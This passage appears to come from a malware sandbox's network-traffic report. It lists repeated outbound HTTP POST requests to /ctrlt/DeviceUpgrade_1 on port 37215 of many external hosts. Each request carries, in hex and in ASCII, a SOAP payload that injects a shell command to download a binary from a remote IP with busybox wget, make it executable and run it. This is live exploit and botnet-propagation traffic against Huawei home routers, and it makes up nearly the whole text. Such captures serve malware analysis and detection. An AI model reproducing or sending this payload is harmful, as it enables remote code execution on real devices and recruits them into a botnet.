68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            542192.168.2.155959241.255.14.21337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.099543095 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            543192.168.2.153982641.226.46.2337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.158879995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            544192.168.2.153736841.46.5.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.158881903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            545192.168.2.155097241.128.170.14637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.158889055 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            546192.168.2.153432841.79.96.24237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.158896923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            547192.168.2.154593241.154.121.16637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.158896923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            548192.168.2.155128441.70.34.7437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.158963919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            549192.168.2.153304841.193.120.7937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.158965111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            550192.168.2.154063841.190.116.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.158982992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            551192.168.2.153524441.205.149.11537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.158996105 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            552192.168.2.154207841.172.198.16837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159015894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
